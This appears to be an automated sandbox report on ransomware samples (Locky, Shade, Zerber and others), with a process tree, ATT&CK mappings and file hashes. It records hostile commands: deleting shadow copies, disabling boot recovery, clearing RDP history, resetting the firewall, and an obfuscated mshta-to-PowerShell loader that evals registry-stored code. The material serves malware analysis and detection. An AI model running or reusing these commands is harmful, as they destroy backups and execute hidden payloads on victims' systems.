C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no"4⤵PID:12240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"4⤵PID:9848
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe.bat" "4⤵PID:6268
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exeTrojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2084
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exeTrojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2944 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exeTrojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe3⤵PID:5844
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exeTrojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2948
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exeTrojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:468 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exeTrojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1512
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exeTrojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1044 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exeTrojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1552 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_AAA1.tmp.bat4⤵
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f5⤵
- Clears Network RDP Connection History and Configurations
- System Location Discovery: System Language Discovery
PID:7884
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f5⤵
- Clears Network RDP Connection History and Configurations
- System Location Discovery: System Language Discovery
PID:13828
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"5⤵
- System Location Discovery: System Language Discovery
PID:11420
-
-
C:\Windows\SysWOW64\attrib.exeattrib Default.rdp -s -h5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4564
-
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_5948.tmp.bat4⤵PID:10504
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_5ACF.tmp.bat4⤵PID:4396
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exeTrojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:448 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exeTrojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2872 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_A1DB.tmp.bat4⤵
- System Location Discovery: System Language Discovery
PID:1076 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f5⤵
- Clears Network RDP Connection History and Configurations
- System Location Discovery: System Language Discovery
PID:9740
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f5⤵
- Clears Network RDP Connection History and Configurations
- System Location Discovery: System Language Discovery
PID:7532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"5⤵
- System Location Discovery: System Language Discovery
PID:10260
-
-
C:\Windows\SysWOW64\attrib.exeattrib Default.rdp -s -h5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:11212
-
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2820
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_5949.tmp.bat4⤵PID:2412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\_5AD0.tmp.bat4⤵PID:10660
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exeTrojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1836
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exeTrojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1348
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exeTrojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exeTrojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:896
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exeTrojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1380 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe"C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe"3⤵PID:2400
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exeTrojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:568 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exeTrojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Users\Admin\AppData\Local\SourceFluid\SourceFluid.exe-U171626882595314374⤵PID:10548
-
C:\Users\Admin\AppData\Local\SourceFluid\SourceFluid.exe-U171626882595314375⤵PID:14992
-
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exeTrojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1532
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eazv-9268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6.exeTrojan-Ransom.Win32.Zerber.eazv-9268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1820
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exeTrojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2276 -
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
PID:11104
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset3⤵
- Modifies Windows Firewall
PID:9308
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___MAOZB0_.hta"3⤵PID:14208
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___JXU56_.txt3⤵
- Opens file in notepad (likely ransom note)
PID:14000
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "T" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:14032 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "T"4⤵
- Kills process with taskkill
PID:14252
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14164
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exeTrojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2136 -
C:\Windows\SysWOW64\cmd.exe/d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe" > NUL3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7576
-
-
C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"3⤵PID:6236
-
-
C:\Windows\SysWOW64\cmd.exe/d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe" > NUL3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:14408
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exeTrojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2344 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exeTrojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe3⤵
- Executes dropped EXE
PID:2848
-
-
-
C:\Users\Admin\Desktop\00294\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exeVHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\is-BK3B7.tmp\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.tmp"C:\Users\Admin\AppData\Local\Temp\is-BK3B7.tmp\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.tmp" /SL5="$1025E,5773711,115200,C:\Users\Admin\Desktop\00294\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2588
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2392
-
C:\Windows\syswow64\svchost.exe"C:\Windows\syswow64\svchost.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6832 -
C:\Windows\SysWOW64\ctfmon.exectfmon.exe2⤵PID:5184
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9680
-
C:\Windows\system32\taskeng.exetaskeng.exe {FC4CF284-6EFD-422A-96D4-5B0D9F250D25} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵PID:3524
-
C:\Windows\system32\cmd.execmd.exe /C copy "C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe" "C:\Users\Admin\AppData\Roaming\wcjxg.exe"2⤵PID:6884
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4476
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵PID:10968
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}1⤵PID:8704
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c1⤵PID:10008
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:8256
-
C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"2⤵PID:15328
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:8120
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8120 CREDAT:275457 /prefetch:22⤵PID:13328
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:V5gOssxG4="AOG8HlwY";L8o3=new%20ActiveXObject("WScript.Shell");AKpgsB9oh="Tcr";e60uav=L8o3.RegRead("HKLM\\software\\Wow6432Node\\5VOzuE5\\jiCCsz");jGoDC4KTq="bqGn2t";eval(e60uav);gC9eH5ash="rS2zrRXRQf";1⤵
- Process spawned unexpected child process
PID:5760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:qikow2⤵
- Command and Scripting Interpreter: PowerShell
PID:11260
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
4Clear Network Connection History and Configurations
1File Deletion
3Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD585f46f7b144e76635e666560847fed3a
SHA1e70cba25f518f7073fa3407a3cbded58fb0a8093
SHA256e2a82ab9378c5db15b9b59ff98be46500c397b83f41f04db82a10fb8c8eb16b1
SHA512bbefcf8de3eba34fe30a142647bc8317bc82e9a6328ea4a0b5928a527cc774e908c53cc37b31902245ec89f4f4c16756b5fc6e33a75ac702453666dc311ad8e4
-
Filesize
8KB
MD5232be16b8d0e5c60cb7f23638ea6df46
SHA1c5043a1713802d52554afe4cdf7b0be27121bce6
SHA2567d7e5a5002f81374e7286aa6f7bceda92da80b4c96031e818832222bfa3183cf
SHA5120296c22b0b9cecb734f459a71da081d0484399ecb2c8ba383f6ae88eca36088d2310f609a3d438a514fc37005cd87daf6e3c6420b9ab26be058c1c6e0c746acd
-
Filesize
67KB
MD5fc114360c8af39696e8953ef2d7f47b8
SHA1d2011ddb6b463e31c7c518af493d11dd2fdedcfe
SHA256e69e12dd50cc769c0a3b323d2324dbe6dadca04c8801b319f192d7e092d71606
SHA512ee20670bc6c39e5b8c517fbd977a026a3126ea1a4370941fb7ca4b5a6f2538c7c7c6e33d47532c5521816bde633f4a7786f0e93d82bb32f90c87b082504f238c
-
Filesize
2KB
MD5c76abb94f6a9ff1cab19b35637550a4b
SHA1ea3de9b6f3d233f5dc8a14cf143c70ae91d4ba48
SHA256b9e57037016344891fb08011cb6fa48ea1925a91f737cb1979b919950c9c715a
SHA5121391650d1e9e3cbec18eaa6e674631095625e594a6aa38a5dcbfaf2c90c486e0483588021a2c5ae8b0dcfd4445cd6233772a12bce1965cae4706a66f58600677
-
Filesize
7KB
MD504b976ff3f5dbc853ed9e2fb6b5136ef
SHA1aceec9253d1969b457a2b1bbbf58009d6e075e86
SHA256a77b83f86549821ee857b8cf761e6e3c08ba5aa13b2a8e33c8e7ee75d34906f6
SHA5128fa32723f52f1326425469dfaaf25b97a5dcc51bd2252b37f9b48465e164e65669acd621979a1796665e50b0e7e24154700b5a74d73cc5dbaf8cc480e9730332
-
Filesize
2KB
MD5de892dc4e1a15ccfb75b5bf516b3c133
SHA16793fc87bec672eda0f466ed35ee4b0a5587d792
SHA256768bc9edadd0ac91464e96fd0d621192012f9a446bcd9a944141f2d8e6aaae67
SHA51214c6bea5d3e439e88785a300095c7e73e54456b8dfdefc60ecb2d6925b6bfd53ee49fbd527d1e0a8815a8fa271e9816f56131999722259153727a8e6e9a8e09f
-
Filesize
12KB
MD5dfa9ce88d470600a9fa5ac226db86ae7
SHA17c87d2e978c5610a39edad14953e31f3cae1dfbe
SHA25642d879fff85d210f28511fd53705f0d64b943c96e31207f50f597b7e2fd84f9f
SHA51291193d74a422f13b5b1f9f071dfc06f8ca5ba63e9effbfa03726cacf3b92acebd9023e7bc8bf084d91eb1f9e372e960566ec4bac7ef2abe3f730f5ab7ba62d06
-
Filesize
36KB
MD5cf5b810ae11097aa6f618f82b6e87b27
SHA11b6501f8222fd3beb95a7c6660a44f5800aea5f9
SHA256e01022bc19d50332d5e325580f2832f507f2897e8c21e203b354db19cb41f78a
SHA5122b373fd06edf7afcb04e96db74c107667e5e0ed532a6f2d45c379b835da7911a4142a0bc5044eb178035f92e574b6922332a8169802cfcfb60a6e1fdf583e4a7
-
Filesize
900B
MD5603cd42b91e924932f4b06a61778b5ec
SHA1f1e3fbc3022b5ac3fb0f4215694354a1df63b451
SHA256e101e61ddb4b6f84d482f49c960d715945f2ef0bf74bfb9808ccd34bf64f7512
SHA5123d7735de2ec90727194c6412a577fd58792fe8ec21c8d5ddfcf6fa0a8fbe16f0e764b09d1e607fba6bd2ed7d06f954489ae324ccb1ea558db1b809cbede660eb
-
Filesize
939B
MD56468d057d7cb30ecd6283ea01e6ab5fd
SHA1df5379d633e558544ebfcb88b6ad3f53e6df09b0
SHA256a2ce2b6c9fc04d26e595e45849916efe01ceba18159013171ce44142830aeffe
SHA512be080542f286df5cd9ff126dcba0057ef0ecf2d8b7767911035f419fc5e8dab4f1a055c04d07e4337af8fdebfae6a254337ab20ab0309eaa1696a1e14f87c10a
-
Filesize
341B
MD585ebed08c41b43efbf4a4f555afa2d0e
SHA1eed2e36357889c9295ba65b12aed733515eed6d7
SHA2569ee38814debdd2d38f3c9f6363d5f7fa77f423bd33d76fd2a074a7fb6cb7a928
SHA51215be03f2df3bdd6b2a0a355924b1024947e91615dea1be1309e791db18ce1c33a09173d348a6c14edd8db6784439927946d6b2c4377919105012b537fbfdbd1c
-
Filesize
222B
MD506df8edd89154d68c49af15d65720af3
SHA1be179da8a60543d3e0bd828be6a9bd3401ed2664
SHA256103f9efbf111ee715ce67f81c3fbe566f93c1e71cec4bac7020ca0eab7c6cf1e
SHA512b13a57147f34cfe6cc7728f80ea62e4cd31f734e4f9d5b7ae9d45f9e4e2e9704a93292342b0ec45bcde4e4796f74b53722a79ed31e5a8c00f1ac1edb28e0229d
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF
Filesize24KB
MD54ef1096e556fbfc5fde3e1fa06304f73
SHA1461f0c5affaf5efdb569e0e696579fc7c993050d
SHA256b5648a7bc06ac614a32061c53f70c852df9f09d6c634a2494bb5e5d81d6216ba
SHA51232c1db24fd9f823431c14935b2623262f100f33ed962dc1faca7c28cec7ba25eb8b31cd12da94f7763e212d50aa454ee2f389776c9b19f20b377dffb8ad35d80
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF
Filesize185B
MD597596fb884501ca1680cdf19ad5418c9
SHA10017139a784fb05c7cbc2286492b233ce9dfb909
SHA25664a56358c52fc799a001e3a565b1606795e3fd72a5364512ef23c6f168b3b284
SHA512d4517e46db786e811c1ba8710464d379a9d6b70df7ab29bb78e1f9d366fc61bacc39991c2423194560bfca2a060a1b04c5b02dc25164e765a288f880c1d33da7
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF
Filesize496B
MD5110879749f7228ff0ed850cffd64b0d1
SHA1ebafaf8a53fc98c7cdecff5e70890681102cfa78
SHA256caa9b95b19cdad10bde5628a9613ab9d93b3943ac9a2a28d42eba1f2b2ee429f
SHA51246c0379bbe55907ae3416ce188b5cf86982af4372e7f2ab4601ce731f4c3a111b0923e82f941186bcfcf04ed0cf0f78092d276b157484463a24c803c66901459
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF
Filesize1KB
MD5a3fcdcfe734d663c003ee6d2b4cc1c3b
SHA13f6297c831b3611f403a878cb39680403d33c603
SHA25685746c8ae6da83216af31569503c86b1011055abbdabfc5a7c98ccca56626fea
SHA5121cf3c313c446c16d2a3af3041bbac7a6be229b9dbb95c0b48ab2841e054fdf6da9432b87ffe4fc15e35d46a138ae3d3eb0e01e5aaa1ebe110404cc176460b616
-
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif
Filesize5KB
MD578b05b567f3d91eedf537e28cc382a73
SHA156631473dc2ebaa4d98307b8966f102822f79f3d
SHA256b046cef058bd43d6afa4c5d4eb1c563edb6c7dfee97dc25e77f3cfe25c888aab
SHA51232aa999092d8d2a7cb67370f5c26ea3ca761611cbc841d49999cea3c0ec3ed91478eb1e3cae0bb5afb303931a5d59c09189eb85ef301a634d019d5a4ea79c2cc
-
